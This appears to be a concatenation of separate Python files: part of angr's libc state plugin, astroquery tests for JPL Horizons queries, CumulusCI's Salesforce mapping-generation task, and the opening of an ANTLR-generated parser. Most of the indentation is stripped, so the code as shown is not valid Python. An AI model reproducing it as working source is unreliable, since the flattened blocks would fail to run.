0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff, # 0xf8
]
def __init__(self):
SimStatePlugin.__init__(self)
# various thresholds
self.buf_symbolic_bytes = 60
self.max_symbolic_strstr = 1
self.max_symbolic_strchr = 16
self.max_variable_size = 128
self.max_str_len = 128
self.max_buffer_size = 48
self.max_strtol_len = 11 # len(str(2**31)) + 1
self.max_memcpy_size = 4096
self.max_packet_size = 256
# strtok
self.strtok_heap = [ ]
self.simple_strtok = True
self.strtok_token_size = 1024
# helpful stuff
self.strdup_stack = [ ]
        # as per Audrey:
        # there are two PPC64 ABI versions, and for one of them the address
        # passed to __libc_start_main isn't actually the address of the
        # function, but the address of a pointer to a struct containing the
        # actual function address and the table-of-contents address
self.ppc64_abiv = None
# It will be initialized in __libc_start_main SimProcedure
self.ctype_b_loc_table_ptr = None
self.ctype_tolower_loc_table_ptr = None
self.ctype_toupper_loc_table_ptr = None
self.errno_location = None
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
c = SimStateLibc()
c.buf_symbolic_bytes = self.buf_symbolic_bytes
c.max_symbolic_strstr = self.max_symbolic_strstr
c.max_symbolic_strchr = self.max_symbolic_strchr
c.max_variable_size = self.max_variable_size
c.max_str_len = self.max_str_len
c.max_buffer_size = self.max_buffer_size
c.max_strtol_len = self.max_strtol_len
c.max_memcpy_size = self.max_memcpy_size
c.max_packet_size = self.max_packet_size
c.strtok_heap = self.strtok_heap[:]
c.simple_strtok = self.simple_strtok
c.strtok_token_size = self.strtok_token_size
c.strdup_stack = self.strdup_stack[:]
c.ppc64_abiv = self.ppc64_abiv
c.ctype_b_loc_table_ptr = self.ctype_b_loc_table_ptr
c.ctype_tolower_loc_table_ptr = self.ctype_tolower_loc_table_ptr
c.ctype_toupper_loc_table_ptr = self.ctype_toupper_loc_table_ptr
c.errno_location = self.errno_location
#c.aa = self.aa
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
return False
def widen(self, others):
return False
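    # errno is stored in simulated memory at `errno_location`; these
    # accessors read and write it as an int.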
@property
def errno(self):
return self.state.mem[self.errno_location].int.resolved
@errno.setter
def errno(self, val):
self.state.mem[self.errno_location].int = val
def ret_errno(self, val):
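        # Translate an errno constant name (an attribute of the posix
        # plugin, e.g. "EINVAL") into a return value: syscalls return the
        # negated errno directly, while libc functions set the errno state
        # and return -1.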
try:
ival = getattr(self.state.posix, val)
except AttributeError as e:
raise ValueError("Invalid errno constant %s" % val) from e
if self.state.scratch.sim_procedure.is_syscall:
return -ival
else:
self.errno = ival
return -1
from angr.sim_state import SimState
SimState.register_default('libc', SimStateLibc)
| |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
from astropy.tests.helper import assert_quantity_allclose
from numpy.ma import is_masked
from ... import jplhorizons
@pytest.mark.remote_data
class TestHorizonsClass:
def test_ephemerides_query(self):
# check values of Ceres for a given epoch
# orbital uncertainty of Ceres is basically zero
res = jplhorizons.Horizons(id='Ceres', location='500',
id_type='smallbody',
epochs=2451544.5).ephemerides()[0]
assert res['targetname'] == "1 Ceres (A801 AA)"
assert res['datetime_str'] == "2000-Jan-01 00:00:00.000"
assert res['solar_presence'] == ""
assert res['flags'] == ""
assert res['elongFlag'] == '/L'
assert res['airmass'] == 999
assert is_masked(res['AZ'])
assert is_masked(res['EL'])
assert is_masked(res['magextinct'])
assert_quantity_allclose(
[2451544.5,
188.70280, 9.09829, 34.40955, -2.68359,
8.469, 7.009, 96.17083,
161.3828, 10.4528, 2.551099014238, 0.1744491,
2.26315116146176, -21.9390511, 18.822054,
95.3996, 22.5698, 292.551, 296.850,
184.3426220, 11.7996521, 289.864329, 71.545655,
0, 0],
[res['datetime_jd'],
res['RA'], res['DEC'], res['RA_rate'], res['DEC_rate'],
res['V'], res['surfbright'], res['illumination'],
res['EclLon'], res['EclLat'], res['r'], res['r_rate'],
res['delta'], res['delta_rate'], res['lighttime'],
res['elong'], res['alpha'], res['sunTargetPA'],
res['velocityPA'],
res['ObsEclLon'], res['ObsEclLat'], res['GlxLon'],
res['GlxLat'],
res['RA_3sigma'], res['DEC_3sigma']], rtol=1e-3)
def test_ephemerides_query_two(self):
# check comet ephemerides using options
obj = jplhorizons.Horizons(id='Halley', id_type='comet_name',
location='290',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(airmass_lessthan=1.2, skip_daylight=True,
closest_apparition=True,
max_hour_angle=10,
solar_elongation=(150, 180))
assert len(res) == 1
res = res[0]
assert res['targetname'] == "1P/Halley"
assert res['datetime_str'] == "2080-Jan-11 09:00"
assert res['solar_presence'] == ""
assert res['flags'] == "m"
assert res['elongFlag'] == '/L'
for value in ['H', 'G']:
assert value not in res.colnames
def test_ephemerides_query_three(self):
# checks no_fragments option for comets
obj = jplhorizons.Horizons(id='73P', id_type='designation',
location='290',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(closest_apparition=True, no_fragments=True)
assert len(res) == 249
res = res[0]
assert res['targetname'] == "73P/Schwassmann-Wachmann 3"
assert res['datetime_str'] == "2080-Jan-01 00:00"
assert res['solar_presence'] == "*"
assert res['flags'] == "m"
assert res['elongFlag'] == '/L'
for value in ['H', 'G']:
assert value not in res.colnames
def test_ephemerides_query_four(self):
# checks for missing M1 with a comet; 167P satisfies this as
# of 18 June 2018
obj = jplhorizons.Horizons(id='167P', id_type='designation',
location='I41',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(closest_apparition=True,
no_fragments=True)
assert len(res) == 249
res = res[0]
assert res['targetname'] == "167P/CINEOS"
assert res['datetime_str'] == "2080-Jan-01 00:00"
assert res['solar_presence'] == "*"
assert res['flags'] == "m"
assert res['elongFlag'] == '/T'
for value in ['H', 'G', 'M1', 'k1']:
assert value not in res.colnames
for value in ['M2', 'k2', 'phasecoeff']:
assert value in res.colnames
def test_ephemerides_query_five(self):
# checks for missing phase coefficient with a comet; 12P
# satisfies this as of 18 June 2018
obj = jplhorizons.Horizons(id='12P', id_type='designation',
location='I41',
epochs={'start': '2080-01-01',
'stop': '2080-02-01',
'step': '3h'})
res = obj.ephemerides(closest_apparition=True)
assert len(res) == 249
res = res[0]
assert res['targetname'] == "12P/Pons-Brooks"
assert res['datetime_str'] == "2080-Jan-01 00:00"
assert res['solar_presence'] == "*"
assert res['flags'] == "m"
assert res['elongFlag'] == '/L'
for value in ['H', 'G', 'phasecoeff']:
assert value not in res.colnames
for value in ['M1', 'k1', 'M2', 'k2']:
assert value in res.colnames
def test_ephemerides_query_six(self):
        # tests optional constraints for ephemerides queries
obj = jplhorizons.Horizons(id='3552', id_type='smallbody',
location='I33',
epochs={'start': '2018-05-01',
'stop': '2018-08-01',
'step': '3h'})
res = obj.ephemerides(skip_daylight=True,
max_hour_angle=8,
refraction=True,
refsystem='B1950',
rate_cutoff=100,
airmass_lessthan=5)
assert len(res) == 32
def test_ephemerides_query_raw(self):
res = (jplhorizons.Horizons(id='Ceres', location='500',
id_type='smallbody', epochs=2451544.5).
ephemerides(get_raw_response=True))
assert len(res) >= 15400
def test_elements_query(self):
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=[2451544.5,
2451545.5]).elements()[0]
assert res['targetname'] == "1 Ceres (A801 AA)"
assert res['datetime_str'] == "A.D. 2000-Jan-01 00:00:00.0000"
assert_quantity_allclose(
[2451544.5,
7.837505767652506E-02, 2.549670133211852E+00,
1.058336086929457E+01,
8.049436516467529E+01, 7.392278852641589E+01,
2.451516163117752E+06,
2.141950393098222E-01, 6.069619607052192E+00,
7.121190541431409E+00,
2.766494282136041E+00, 2.983318431060230E+00,
1.680711192752127E+03],
[res['datetime_jd'],
res['e'], res['q'],
res['incl'],
res['Omega'], res['w'],
res['Tp_jd'],
res['n'], res['M'],
res['nu'],
res['a'], res['Q'],
res['P']], rtol=1e-3)
def test_elements_query_two(self):
obj = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=[2451544.5,
2451545.5])
res = obj.elements(refsystem='B1950',
refplane='earth',
tp_type='relative')[1]
assert_quantity_allclose([23.24472584135690,
132.6482045485004,
-29.33632558181947],
[res['Omega'], res['w'], res['Tp_jd']],
rtol=1e-3)
def test_elements_query_raw(self):
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=2451544.5).elements(
get_raw_response=True)
assert len(res) >= 6686
def test_vectors_query(self):
# check values of Ceres for a given epoch
# orbital uncertainty of Ceres is basically zero
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=2451544.5).vectors()[0]
assert res['targetname'] == "1 Ceres (A801 AA)"
assert res['datetime_str'] == "A.D. 2000-Jan-01 00:00:00.0000"
assert_quantity_allclose(
[2451544.5,
-2.377530254715913E+00, 8.007773098011088E-01,
4.628376171505864E-01,
-3.605422534068209E-03, -1.057883330464988E-02,
3.379791158988872E-04,
1.473392692285918E-02, 2.551100364907553E+00,
1.007960852643289E-04],
[res['datetime_jd'],
res['x'], res['y'],
res['z'],
res['vx'], res['vy'],
res['vz'],
res['lighttime'], res['range'],
res['range_rate']], rtol=1e-3)
def test_vectors_query_raw(self):
res = jplhorizons.Horizons(id='Ceres', location='500@10',
id_type='smallbody',
epochs=2451544.5).vectors(
get_raw_response=True)
assert len(res) >= 6412
def test_unknownobject(self):
with pytest.raises(ValueError):
jplhorizons.Horizons(id='spamspamspameggsspam', location='500',
epochs=2451544.5).ephemerides()
def test_multipleobjects(self):
with pytest.raises(ValueError):
jplhorizons.Horizons(id='73P', location='500', id_type='smallbody',
epochs=2451544.5).ephemerides()
def test_uri(self):
target = jplhorizons.Horizons(id='3552', location='500',
id_type='smallbody', epochs=2451544.5)
assert target.uri is None
target.ephemerides()
assert target.uri == ('https://ssd.jpl.nasa.gov/api/horizons.api?'
'format=text&EPHEM_TYPE=OBSERVER&QUANTITIES='
'%271%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10'
'%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19'
'%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28'
'%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37'
'%2C38%2C39%2C40%2C41%2C42%2C43%27&'
'COMMAND=%223552%3B%22&SOLAR_ELONG=%220%2C180'
'%22&LHA_CUTOFF=0&CSV_FORMAT=YES&CAL_FORMAT='
'BOTH&ANG_FORMAT=DEG&APPARENT=AIRLESS&'
'REF_SYSTEM=ICRF&EXTRA_PREC=NO&'
'CENTER=%27500%27&'
'TLIST=2451544.5&SKIP_DAYLT=NO')
    def test_userdefinedlocation_ephemerides_query(self):
anderson_mesa = {'lon': -111.535833,
'lat': 35.096944,
'elevation': 2.163}
am_res = jplhorizons.Horizons(id='Ceres',
location='688',
id_type='smallbody',
epochs=2451544.5).ephemerides()[0]
user_res = jplhorizons.Horizons(id='Ceres',
location=anderson_mesa,
id_type='smallbody',
epochs=2451544.5).ephemerides()[0]
assert_quantity_allclose([am_res['RA'], am_res['DEC']],
[user_res['RA'], user_res['DEC']])
def test_majorbody(self):
"""Regression test for "Fix missing columns... #1268"
https://github.com/astropy/astroquery/pull/1268
Horizons.ephemerides would crash for majorbodies because the
returned columns have different names from other bodies. The
culprits were: Obsrv-lon, Obsrv-lat, Solar-lon, Solar-lat
"""
epochs = dict(start='2019-01-01', stop='2019-01-02', step='1d')
quantities = ('1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'
'21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,'
'38,39,40,41,42,43')
target = jplhorizons.Horizons(id='301', location='688', epochs=epochs)
eph = target.ephemerides(quantities=quantities)
assert len(eph) == 2
def test_airmass(self):
"""Regression test for "Airmass issues with jplhorizons #1284"
Horizons.ephemerides would crash when Horizons returned tables
with no masked data. The error occurs when attempting to fill
bad values in the 'a-mass' column:
``data['a-mass'].filled(99)``. However, with no masked data,
ascii.read returns a normal Table, and the 'a-mass' column was
missing the ``filled`` method.
In addition, the same lines would crash if airmass was not
requested in the returned table.
"""
# verify data['a-mass'].filled(99) works:
target = jplhorizons.Horizons('Ceres', location='I41',
id_type='smallbody',
epochs=[2458300.5])
eph = target.ephemerides(quantities='1,8')
assert len(eph) == 1
# skip data['a-mass'].filled(99) if 'a-mass' not returned
eph = target.ephemerides(quantities='1')
assert len(eph) == 1
def test_vectors_aberrations(self):
"""Check functionality of `aberrations` options"""
obj = jplhorizons.Horizons(id='1', epochs=2458500, location='500@0',
id_type='smallbody')
vec = obj.vectors(aberrations='geometric')
assert_quantity_allclose(vec['x'][0], -2.086487005013347)
vec = obj.vectors(aberrations='astrometric')
assert_quantity_allclose(vec['x'][0], -2.086576286974797)
vec = obj.vectors(aberrations='apparent')
assert_quantity_allclose(vec['x'][0], -2.086576286974797)
def test_vectors_delta_T(self):
obj = jplhorizons.Horizons(id='1', epochs=2458500, location='500@0',
id_type='smallbody')
vec = obj.vectors(delta_T=False)
assert 'delta_T' not in vec.columns
vec = obj.vectors(delta_T=True)
assert_quantity_allclose(vec['delta_T'][0], 69.184373)
def test_ephemerides_extraprecision(self):
obj = jplhorizons.Horizons(id='1', epochs=2458500, location='G37',
id_type='smallbody')
vec_simple = obj.ephemerides(extra_precision=False)
vec_highprec = obj.ephemerides(extra_precision=True)
        assert abs(vec_simple['RA'][0] - vec_highprec['RA'][0]) > 1e-7
| |
from collections import defaultdict
from typing import Dict
import click
import yaml
from cumulusci.core.utils import process_list_arg, process_bool_arg
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
from cumulusci.core.exceptions import TaskOptionsError
class GenerateMapping(BaseSalesforceApiTask):
task_docs = """
Generate a mapping file for use with the `extract_dataset` and `load_dataset` tasks.
This task will examine the schema in the specified org and attempt to infer a
mapping suitable for extracting data in packaged and custom objects as well as
customized standard objects.
    Mappings must be serializable, and hence must resolve reference cycles: situations
where Object A refers to B, and B also refers to A. Mapping generation will stop
and request user input to resolve such cycles by identifying the correct load order.
If you would rather the mapping generator break such a cycle randomly, set the
`break_cycles` option to `auto`.
    Alternatively, specify the `ignore` option with the name of one of the
lookup fields to suppress it and break the cycle. `ignore` can be specified as a list in
`cumulusci.yml` or as a comma-separated string at the command line.
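
    For example (illustrative only, assuming the task is registered as
    `generate_dataset_mapping`), the cycle-breaking `ignore` option can be
    set in `cumulusci.yml` like this::

        tasks:
            generate_dataset_mapping:
                options:
                    ignore: Account.ParentId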
In most cases, the mapping generated will need minor tweaking by the user. Note
that the mapping omits features that are not currently well supported by the
`extract_dataset` and `load_dataset` tasks, such as references to
the `User` object.
"""
task_options = {
"path": {"description": "Location to write the mapping file", "required": True},
"namespace_prefix": {"description": "The namespace prefix to use"},
"ignore": {
"description": "Object API names, or fields in Object.Field format, to ignore"
},
"break_cycles": {
"description": "If the generator is unsure of the order to load, what to do? "
"Set to `ask` (the default) to allow the user to choose or `auto` to pick randomly."
},
"include": {
"description": "Object names to include even if they might not otherwise be included."
},
"strip_namespace": {
"description": "If True, CumulusCI removes the project's namespace where found in fields "
" and objects to support automatic namespace injection. On by default."
},
}
core_fields = ["Name", "FirstName", "LastName"]
def _init_options(self, kwargs):
super(GenerateMapping, self)._init_options(kwargs)
if "namespace_prefix" not in self.options:
self.options["namespace_prefix"] = ""
if self.options["namespace_prefix"] and not self.options[
"namespace_prefix"
].endswith("__"):
self.options["namespace_prefix"] += "__"
self.options["ignore"] = process_list_arg(self.options.get("ignore", []))
break_cycles = self.options.setdefault("break_cycles", "ask")
if break_cycles not in ["ask", "auto"]:
raise TaskOptionsError(
f"`break_cycles` should be `ask` or `auto`, not {break_cycles}"
)
self.options["include"] = process_list_arg(self.options.get("include", []))
strip_namespace = self.options.get("strip_namespace")
self.options["strip_namespace"] = process_bool_arg(
True if strip_namespace is None else strip_namespace
)
def _run_task(self):
self.logger.info("Collecting sObject information")
self._collect_objects()
self._build_schema()
filename = self.options["path"]
self.logger.info(f"Creating mapping schema {filename}")
self._build_mapping()
with open(filename, "w") as f:
yaml.dump(self.mapping, f, sort_keys=False)
def _collect_objects(self):
"""Walk the global describe and identify the sObjects we need to include in a minimal operation."""
self.mapping_objects = self.options["include"]
# Cache the global describe, which we'll walk.
self.global_describe = self.sf.describe()
sobject_names = set(obj["name"] for obj in self.global_describe["sobjects"])
unknown_objects = set(self.mapping_objects) - sobject_names
if unknown_objects:
raise TaskOptionsError(f"{unknown_objects} cannot be found in the org.")
# First, we'll get a list of all objects that are either
# (a) custom, no namespace
# (b) custom, with our namespace
# (c) not ours (standard or other package), but have fields with our namespace or no namespace
self.describes = {} # Cache per-object describes for efficiency
for obj in self.global_describe["sobjects"]:
self.describes[obj["name"]] = getattr(self.sf, obj["name"]).describe()
if self._is_our_custom_api_name(obj["name"]) or self._has_our_custom_fields(
self.describes[obj["name"]]
):
if (
self._is_object_mappable(obj)
and obj["name"] not in self.mapping_objects
):
self.mapping_objects.append(obj["name"])
# Add any objects that are required by our own,
# meaning any object we are looking up to with a custom field,
# or any master-detail parent of any included object.
index = 0
while index < len(self.mapping_objects):
obj = self.mapping_objects[index]
for field in self.describes[obj]["fields"]:
if field["type"] == "reference":
if field["relationshipOrder"] == 1 or self._is_any_custom_api_name(
field["name"]
):
self.mapping_objects.extend(
[
obj
for obj in field["referenceTo"]
if obj not in self.mapping_objects
and self._is_object_mappable(self.describes[obj])
]
)
index += 1
def _build_schema(self):
"""Convert self.mapping_objects into a schema, including field details and interobject references,
in self.schema and self.refs"""
# Now, find all the fields we need to include.
# For custom objects, we include all custom fields. This includes custom objects
# that our package doesn't own.
# For standard objects, we include all custom fields, all required standard fields,
# and master-detail relationships. Required means createable and not nillable.
# In all cases, ensure that RecordTypeId is included if and only if there are Record Types
self.schema = {}
self.refs = defaultdict(lambda: defaultdict(dict))
for obj in self.mapping_objects:
self.schema[obj] = {}
for field in self.describes[obj]["fields"]:
if any(
[
self._is_any_custom_api_name(field["name"]),
self._is_core_field(field["name"]),
self._is_required_field(field),
self._is_lookup_to_included_object(field),
]
):
if self._is_field_mappable(obj, field):
self.schema[obj][field["name"]] = field
if field["type"] == "reference":
for target in field["referenceTo"]:
# We've already vetted that this field is referencing
# included objects, via `_is_field_mappable()`
if target != obj:
self.refs[obj][target][field["name"]] = FieldData(
field
)
if (
field["name"] == "RecordTypeId"
and len(self.describes[obj]["recordTypeInfos"]) > 1
):
# "Master" is included even if no RTs.
self.schema[obj][field["name"]] = field
def _build_mapping(self):
"""Output self.schema in mapping file format by constructing a dict and serializing to YAML"""
objs = list(self.schema.keys())
assert all(objs)
stack = self._split_dependencies(objs, self.refs)
ns = self.project_config.project__package__namespace
def strip_namespace(element):
if self.options["strip_namespace"] and ns and element.startswith(f"{ns}__"):
return element[len(ns) + 2 :]
else:
return element
self.mapping = {}
for orig_obj in stack:
# Check if it's safe for us to strip the namespace from this object
stripped_obj = strip_namespace(orig_obj)
obj = stripped_obj if stripped_obj not in stack else orig_obj
key = f"Insert {obj}"
self.mapping[key] = {}
self.mapping[key]["sf_object"] = obj
fields = []
lookups = []
for field in self.schema[orig_obj].values():
if field["type"] == "reference" and field["name"] != "RecordTypeId":
# For lookups, namespace stripping takes place below.
lookups.append(field["name"])
else:
fields.append(field["name"])
if fields:
fields_stripped = [
strip_namespace(f) if strip_namespace(f) not in fields else f
for f in fields
]
fields_stripped.sort()
self.mapping[key]["fields"] = fields_stripped
if lookups:
lookups.sort()
self.mapping[key]["lookups"] = {}
for orig_field in lookups:
# First, determine what manner of lookup we have here.
stripped_field = (
strip_namespace(orig_field)
if strip_namespace(orig_field) not in lookups
else orig_field
)
referenceTo = self.schema[orig_obj][orig_field]["referenceTo"]
if len(referenceTo) > 1: # Polymorphic lookup
self.logger.warning(
f"Field {orig_obj}.{orig_field} is a polymorphic lookup, which is not supported"
)
else:
orig_reference = referenceTo[0]
# Can we safely namespace-strip this reference?
stripped_reference = (
strip_namespace(orig_reference)
if strip_namespace(orig_reference) not in stack
else orig_reference
)
if orig_reference == orig_obj: # Self-lookup
self.mapping[key]["lookups"][stripped_field] = {
"table": stripped_reference,
"after": key,
}
elif stack.index(orig_reference) > stack.index(
orig_obj
): # Dependent lookup
self.mapping[key]["lookups"][stripped_field] = {
"table": stripped_reference,
"after": f"Insert {stripped_reference}",
}
else: # Regular lookup
self.mapping[key]["lookups"][stripped_field] = {
"table": stripped_reference
}
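    # A hedged sketch of the three lookup shapes emitted above, using
    # hypothetical object and field names (YAML form of self.mapping):
    #
    #   Insert Account:
    #     sf_object: Account
    #     lookups:
    #       Parent__c:  {table: Account, after: Insert Account}  # self-lookup
    #       Later__c:   {table: Later, after: Insert Later}      # dependent lookup
    #       Earlier__c: {table: Earlier}                         # regular lookup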
def _split_dependencies(self, objs, dependencies):
"""Attempt to flatten the object network into a sequence of load operations."""
stack = []
objs_remaining = sorted(objs)
        # The structure of `dependencies` is:
        # key = object, value = dict mapping each object it references to the
        # fields that create the reference.
        # Iterate through our list of objects.
        # For each object with no remaining dependencies, append it to the stack.
        # Once an object is placed in the stack, remove dependencies on it (they're satisfied).
while objs_remaining:
objs_without_deps = [
obj
for obj in objs_remaining
if obj not in dependencies or not dependencies[obj]
]
assert all(objs_without_deps)
if not objs_without_deps:
choice = self.choose_next_object(objs_remaining, dependencies)
assert choice
objs_without_deps = [choice]
for obj in objs_without_deps:
stack.append(obj)
# Remove all dependencies on this object (they're satisfied)
for other_obj in dependencies:
                    if obj in dependencies[other_obj]:
del dependencies[other_obj][obj]
# Remove this object from our remaining set.
objs_remaining.remove(obj)
return stack
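    # A minimal sketch of the resulting order, with hypothetical data:
    # given objs = ["Child__c", "Parent__c"] and
    # dependencies = {"Child__c": {"Parent__c": {"Ref__c": FieldData(...)}}},
    # Parent__c has no dependencies and is placed first, its entry is then
    # removed from Child__c's dependencies, and the stack comes back as
    # ["Parent__c", "Child__c"] -- parents load before the children that
    # reference them.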
def find_free_object(self, objs_remaining: list, dependencies: dict):
# if you change this code, remember that
# peeking into a generator consumes it
free_objs = (
sobj
for sobj in objs_remaining
if only_has_soft_dependencies(sobj, dependencies[sobj])
)
first_free_obj = next(free_objs, None)
return first_free_obj
def choose_next_object(self, objs_remaining: list, dependencies: dict):
free_obj = self.find_free_object(objs_remaining, dependencies)
if free_obj:
return free_obj
if self.options["break_cycles"] == "auto":
            return objs_remaining[0]
else:
return self.ask_user(objs_remaining, dependencies)
def ask_user(self, objs_remaining, dependencies):
self.logger.info(
"CumulusCI needs help to complete the mapping; the schema contains reference cycles and unresolved dependencies."
)
self.logger.info("Remaining objects:")
for obj in objs_remaining:
self.logger.info(obj)
for other_obj in dependencies[obj]:
self.logger.info(
f" references {other_obj} via: {', '.join(dependencies[obj][other_obj])}"
)
return click.prompt(
"Which object should we load first?",
type=click.Choice(tuple(objs_remaining)),
show_choices=True,
)
def _is_any_custom_api_name(self, api_name):
"""True if the entity name is custom (including any package)."""
return api_name.endswith("__c")
def _is_our_custom_api_name(self, api_name):
"""True if the entity name is custom and has our namespace prefix (if we have one)
or if the entity does not have a namespace"""
return self._is_any_custom_api_name(api_name) and (
(
self.options["namespace_prefix"]
and api_name.startswith(self.options["namespace_prefix"])
)
or api_name.count("__") == 1
)
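    # Illustrative outcomes, assuming options["namespace_prefix"] == "npsp__"
    # (a hypothetical prefix):
    #   "npsp__Custom__c"  -> True  (our namespace)
    #   "Custom__c"        -> True  (no namespace: a single "__")
    #   "other__Custom__c" -> False (someone else's namespace)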
def _is_core_field(self, api_name):
"""True if this field is one that we should always include regardless
of other settings or field configuration, such as Contact.FirstName.
DB-level required fields don't need to be so handled."""
return api_name in self.core_fields
def _is_object_mappable(self, obj):
"""True if this object is one we can map, meaning it's an sObject and not
some other kind of entity, it's not ignored, it's Bulk API compatible,
and it's not in a hard-coded list of entities we can't currently handle."""
return not any(
[
obj["name"] in self.options["ignore"], # User-specified exclusions
obj["name"].endswith(
"ChangeEvent"
), # Change Data Capture entities (which get custom fields)
obj["name"].endswith("__mdt"), # Custom Metadata Types (MDAPI only)
obj["name"].endswith("__e"), # Platform Events
obj["customSetting"], # Not Bulk API compatible
obj["name"] # Objects we can't or shouldn't load/save
in [
"User",
"Group",
"LookedUpFromActivity",
"OpenActivity",
"Task",
"Event",
"ActivityHistory",
],
]
)
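    # Illustrative outcomes (hypothetical names): "AccountChangeEvent",
    # "Config__mdt", "Signal__e", any custom setting, and "User" are all
    # rejected; a plain "MyObject__c" passes unless listed in options["ignore"].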
def _is_field_mappable(self, obj, field):
"""True if this field is one we can map, meaning it's not ignored,
it's createable by the Bulk API, it's not a deprecated field,
and it's not a type of reference we can't handle without special
configuration (self-lookup or reference to objects not included
in this operation)."""
return not any(
[
field["name"] == "Id", # Omit Id fields for auto-pks
f"{obj}.{field['name']}" in self.options["ignore"], # User-ignored list
"(Deprecated)" in field["label"], # Deprecated managed fields
field["type"] == "base64", # No Bulk API support for base64 blob fields
not field["createable"], # Non-writeable fields
field["type"] == "reference" # Outside lookups
and not self._are_lookup_targets_in_operation(field),
]
)
def _is_required_field(self, field):
"""True if the field is either database-level required or a master-detail
relationship field."""
return (field["createable"] and not field["nillable"]) or (
field["type"] == "reference" and field["relationshipOrder"] == 1
)
def _has_our_custom_fields(self, obj):
"""True if the object is owned by us or contains any field owned by us."""
return any(
[self._is_our_custom_api_name(field["name"]) for field in obj["fields"]]
)
def _are_lookup_targets_in_operation(self, field):
"""True if this lookup field aims at objects we are already including (all targets
must match, although we don't provide actual support for polymorphism)."""
return all([f in self.mapping_objects for f in field["referenceTo"]])
def _is_lookup_to_included_object(self, field):
"""True if this field is a lookup and also references only objects we are
already including."""
return field["type"] == "reference" and self._are_lookup_targets_in_operation(
field
)
class FieldData:
nillable: bool
def __init__(self, describe_data: dict):
self.nillable = describe_data.get("nillable", False)
def __eq__(self, other: "FieldData"):
return self.__dict__ == other.__dict__
def only_has_soft_dependencies(
sobj: str, obj_dependencies: Dict[str, Dict[str, FieldData]]
):
for target_obj, field_deps in obj_dependencies.items():
for field_name, field_data in field_deps.items():
# all nillable references are considered soft dependencies.
#
# A single hard dependency renders an object "not yet free"
if not field_data.nillable:
return False
return True
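# A minimal sketch of the soft-dependency check, with hypothetical data:
#
#   soft = {"Parent__c": {"Ref__c": FieldData({"nillable": True})}}
#   only_has_soft_dependencies("Child__c", soft)  # True: all refs nillable
#
#   hard = {"Parent__c": {"Ref__c": FieldData({"nillable": False})}}
#   only_has_soft_dependencies("Child__c", hard)  # False: one hard dependency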
# Generated from /home/marisa/Work/tvm/python/tvm/relay/grammar/Relay.g4 by ANTLR 4.7.1
# encoding: utf-8
from antlr4 import *
from io import StringIO
from typing import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3*")
buf.write("\u014c\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\3\2\3\2\3\3\3\3\7\3+\n\3\f\3\16\3.\13\3\3\3\5\3\61\n")
buf.write("\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4")
buf.write("\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\6\4H\n\4\r\4\16\4I\3")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\7\4R\n\4\f\4\16\4U\13\4\5\4W\n")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\5\4d\n")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\5\4n\n\4\3\4\3\4\3")
buf.write("\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4")
buf.write("\5\4\u0080\n\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4")
buf.write("\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\7\4\u0096\n\4")
buf.write("\f\4\16\4\u0099\13\4\5\4\u009b\n\4\3\4\7\4\u009e\n\4\f")
buf.write("\4\16\4\u00a1\13\4\3\5\3\5\5\5\u00a5\n\5\3\5\3\5\3\5\3")
buf.write("\5\3\5\5\5\u00ac\n\5\3\5\3\5\3\6\3\6\3\6\5\6\u00b3\n\6")
buf.write("\3\6\3\6\3\6\3\6\3\6\5\6\u00ba\n\6\3\6\3\6\3\7\3\7\3\7")
